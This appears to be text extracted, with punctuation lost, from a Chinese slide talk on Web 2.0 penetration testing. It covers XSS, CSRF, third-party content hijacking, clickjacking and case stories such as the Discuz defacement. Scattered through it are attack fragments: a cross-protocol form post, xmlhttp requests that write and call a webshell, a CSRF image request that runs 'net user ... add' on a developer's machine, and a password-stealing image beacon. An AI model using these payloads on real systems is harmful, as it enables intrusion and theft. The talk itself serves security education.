WEB2.0下的滲透測試

WEB2 0下的滲透測試 WEB1 0下的滲透測試 通過web服務器漏洞直接溢出得到cmdshelliis60day bin t p80通過web應用程序傳統(tǒng)漏洞得到webshell傳統(tǒng)漏洞是指作用于web服務端語言的漏洞如上傳 sql注射 包含等 phpwind0day php t p80主要特點屬于服務端攻擊 攻擊效果 直截了當 還是目前主流的滲透測試方式 但是尋找漏洞成本越來越高 安全產品的應用使利用越來越困難 關于WEB2 0 Web2 0一種相對概念 提倡的是高親和力的交互應用 主體是用戶之間用戶與網站之間的互動 Web2 0的核心注重的不僅是技術 而更注重的設計思想 AJAX技術的誕生標著web進入2 0時代 也是其核心技術web2 0更注重互動的設計思想如博客 wiki sns網絡等誕生Web2 0下的滲透繼承了web2 0的特點 思想更重要 WEB2 0下的滲透測試 攻擊的目標主要的攻擊方式 XSS CSRF 第三方內容劫持 Clickjacking等 攻擊方式的趨勢走向攻擊成功后的效果現(xiàn)有的認識幾個滲透小故事 攻擊的目標 與WEB1 0相比 WEB2 0滲透是針對客戶端的攻擊 包括網站用戶 網站的管理員 網站的運維 安全人員 還包括和你一樣的 滲透者 主要的攻擊方式 XSS XSS在web1 0誕生 在web2 0時代出名 1996年就有人提到了這類攻擊 JeremiahGrossman說的 1999年DavidRoss和GeorgiGuninski提出 Scriptinjection 2000年apache官方一篇文檔里正式取名 CrossSiteScripting 2005年samyworm誕生 標志著XSS進入web2 0時代 xss火了 2007年出版的 XSSAttacksBook 提出 XSSistheNewBufferOverflow JavaScriptMalwareisthenewshellcode XSS的利用 web1 0時代 彈筐 alert 收集cookie document cookie web2 0時代 xssworm這也是目前xss的主流利用 我們思想還處于90年代 這也是廣大腳本小子被bs的原因之一 XSS 彈筐 收集cookie wormxss本質是在于執(zhí)行腳本 javascript html等 而一個javascript就足夠讓你黑遍這個世界 主要的攻擊方式 CSRF CSRF CrossSiteRequestForgery誕生于2000年 火于2007 2008年 得益于XSS的光芒 及幾大web2 0的應用如gmail的CSRF漏洞 直譯為 跨站請求偽造 跨 是它的核心 跨httpsite 攻防技術已經趨于成熟如 BypassPreventingCSRF 2008年對于csrf的防御 CSRFworm我在2008 01年blog提到過這個概念 2008 0980sec實現(xiàn) 百度HiCsrf蠕蟲攻擊 跨協(xié)議通信 Inter ProtocolCommunication byWadeAlcorn2006年 讓通過客戶端攻擊用戶本地電腦其他服務變?yōu)榭赡?如下代碼在webkit下實現(xiàn)了http與irc的通信 gibson document createElement form gibson setAttribute name B gibson setAttribute target A gibson setAttribute method post gibson setAttribute action gibson setAttribute enctype multipart from data crashoverride document createElement textarea crashoverride setAttribute name C postdata USERABCD nNickxxxx n crashoverride setAttribute value postdata crashoverride innerText postdata crashoverride innerHTML postdata gibson appendChild crashoverride document body appendChild gibson gibson submit 主要的攻擊方式 CSRF 從其他應用程序發(fā)起的跨站請求如wordwinrar等文件 主要的攻擊方式 第三方內容劫持 TheDangersofThirdPartyContent bySanJoseOWASP WASCAppSec20072009年開始天朝紅火了一把 Dz事件 在后面講具體提到 廣告業(yè)務 網頁游戲 統(tǒng)計服務導致第三方內容應用廣泛 web應用程序里的第三方內容 比如bbs官方升級提示功能等其他應用程序里的第三方內容 如瀏覽器插件里的引入的jshtml等 包括JavaScript HTML Flash CSS etc 主要的攻擊方式 第三方內容劫持 又一個個 引狼入室 的悲劇故事 劫持第三方內容的方法 域名劫持如百度事件 直接攻擊域名注冊商 會話劫持 如arp會話劫持 zxarps exe 交換機會話劫持 SSClone 直接攻取第三方內容服務器權限 恩 很黃很暴力 目前基本沒有安全防御意識 你的安全被別人做了主了 主要的攻擊方式 Clickjacking Clickjacking 點擊劫持 byJeremiahGrossmanandRobertHansenin2008 立刻紅火 WEB2 0安全進入 美工黑客 時代 安全防御者的惡夢 一個新的httpheader誕生 X Frame Options衍生出的其他UI劫持如 Tapjacking 觸摸劫持 攻擊方式的趨勢走向 攻擊方式越來越 猥瑣 沒有最 猥瑣 只有更 猥瑣 新的攻擊方式從誕生到紅火時間越來越短 攻擊成功后的效果 從上面的攻擊方式來看 它們有一個共同的目標 劫持你的瀏覽器 哪里有瀏覽器哪里就有攻擊 劫持你的瀏覽器 的效果就是你的 身份被劫持 所以攻擊目標的 身份 決定了 滲透思想 攻擊成功后的效果 劫取你的隱私 網站的普通用戶如常見的取得你ID 密碼 cookie 聯(lián)系等劫取你的權限 網站管理人員如網站的后臺 進一步通過后臺得到網站的權限等劫取你的系統(tǒng) 所有用戶如利用瀏覽器的漏洞 或者通過跨協(xié)議利用你系統(tǒng)上其他服務的漏洞得到你的系統(tǒng)權限 或者取得本地系統(tǒng)上文件的讀寫能力等劫取你的 內網 公司成員 這個又因在內網的身份不同而不同 如分開發(fā)測試員 運維人員 內部網絡管理人員 安全測試人員等等 如通過攻擊程序員的開發(fā)環(huán)境 直接取得內網系統(tǒng)的權限 目前對于WEB2 0滲透測試的認識 Web2 0滲透 xss 彈筐 收集cookie wormWeb2 0滲透 Mailxss office等軟件0day釣魚Web2 0滲透 Xssshell Beef Anehta這些xss攻擊平臺工具 看了下面的幾個故事 或許有所改變 幾個滲透小故事 黑遍全世界 談談 Dz事件 螳螂捕蟬 談談 滲透者自身的安全 本地web開發(fā)測試環(huán)境的安全隱患 來自 漏洞庫 的漏洞 是誰想動了我的奶酪 黑遍全世界 之 Dz事件 名詞解釋 Dz事件 是指2009年1月8日一大批的Discuz 論壇的首頁被篡改為 Hackedbyring04h justforfun 的事件 官方通告 本次安全問題系由域名劫持造成 Discuz 各版本軟件代碼在安全上并無問題 事件的根本原因是 第三方內容劫持 這里 第三方內容 具體是指 后臺升級提示系統(tǒng) 引入位于上的javascript代碼Discuz 5 5 0 SC GBK upload admin global func php echo 從官方通告來看ring04h正是通過攻擊這個域名來達到劫持這個js的目的 被劫持后的代碼片段 獲取FORMHASHxmlhttp open GET siteurl admincp php action home來達到篡改主頁的目的 本次事件是 善意 的 惡意 的攻擊還在后頭 結合其他后臺得到webshell的漏洞 可以直接控制整個被攻擊的論壇主機 如 通過SODB 2008 10寫入webshell xmlhttp open POST siteurl admincp php action runwizard直接把寫入了forumdata logs runwizardlog php文件里 在后續(xù)的 惡意 的攻擊 跨應用程序的 第三方內容劫持 攻擊 讓你 黑遍全世界 目前discuz就升級提示功能已經放棄了使用引入第三方js了 但是還有其他功能里有應用 目前大多數(shù)應用程序使用引入第三方js 如phpwind 螳螂捕蟬 黃雀在后 攻擊者 螳螂 把捕獲的 蟬 的密碼通過img發(fā)送給steal php收集保存某個文件里或者數(shù)據(jù)庫里 然后后臺顯示管理 這個后臺管理就是攻擊者 黃雀 的目標了 嘗試提交url com steal php data 3Cscript 20src 3Dhttp 3A 2F 2F http 的代碼 因為不是 惡意 攻擊 只是簡單的收集了一下ip及referer 后臺url 本地web開發(fā)測試環(huán)境的安全隱患 故事發(fā)生在2008年的一天 從一個圖片開始 Phpspy缺少csrf的防御 我們可以嘗試下直接利用phpspy本身的 執(zhí)行命令 功能來攻擊開發(fā)者 angel 的本地開發(fā)環(huán)境 聯(lián)系angel得到phpspy2008的代碼 得到了 執(zhí)行命令 功能的提交方式 當時構造代碼如下 varurl userheigeheige add echofuck c heige txt getURL url functiongetURL s varimage newImage image style width 0 image style height 0 image src s 找了個借口讓angel訪問了放置如上代碼的url 結果 因為沒有考慮ie的 隱私策略 導致cookie被攔截而失敗 但是這個思路是完全可行的 其他的一些思路 A Dz事件 的延續(xù) 調用通過后臺得到的webshell forumdata logs runwizardlog php執(zhí)行系統(tǒng)命令 本地web服務器是apache的 一般都是用高權限運行 xmlhttp open POST siteurl forumdata logs runwizardlog php false xmlhttp setRequestHeader Referer siteurl xmlhttp setRequestHeader Content Type application x 執(zhí)行命令為netuser80vul80vul add在實際hack中可以換為或者echoiget vbs等方法下載并且執(zhí)行你的程序xmlhttp send cmd 6E 65 74 20 75 73 65 7 B 利用開發(fā)編輯器的漏洞 如 C 利用系統(tǒng)其他服務的漏洞比如某ftp軟件的溢出漏洞等 使用 跨協(xié)議通信 或者相關的協(xié)議攻擊本地 如 SunSolaris10ftpd存在一個繞過驗證執(zhí)行系統(tǒng)命令的漏洞 他可以通過直接在網頁里調用實現(xiàn)對本地的攻擊 一個挑戰(zhàn) HackGameNo 1 來自 漏洞庫 的漏洞 該故事發(fā)生在今年的5月由80vul發(fā)起的 SOBB 項目 在部分的漏洞公告里 我們預留了一個攻擊接口 目的是為了探測各大網絡媒體轉貼觸發(fā)的xss漏洞 不過一不小心直接跨進了某著名網絡安全公司的內網的 漏洞庫 后續(xù)的攻擊 是誰想動了我的奶酪 80vul建立以來 有沒有人想黑我們呢 于是我們布置了一個簡單的 網 Content Type text htmlServer Microsoft IIS 7 0X Powered By PHP 5 2 12 Date Sun 28Nov201011 21 26GMTContent Length 5993 是誰想動了我的奶酪 用標簽加載img php后 用onload事件加載javascript文件anti php這樣設計的目的 只有img php和anti php兩個文件都加載時 才說明有 魚 進網 防止別人單一提交的嘗試 新時代的防御 加強培訓 一個永恒的主題 SDL的前提和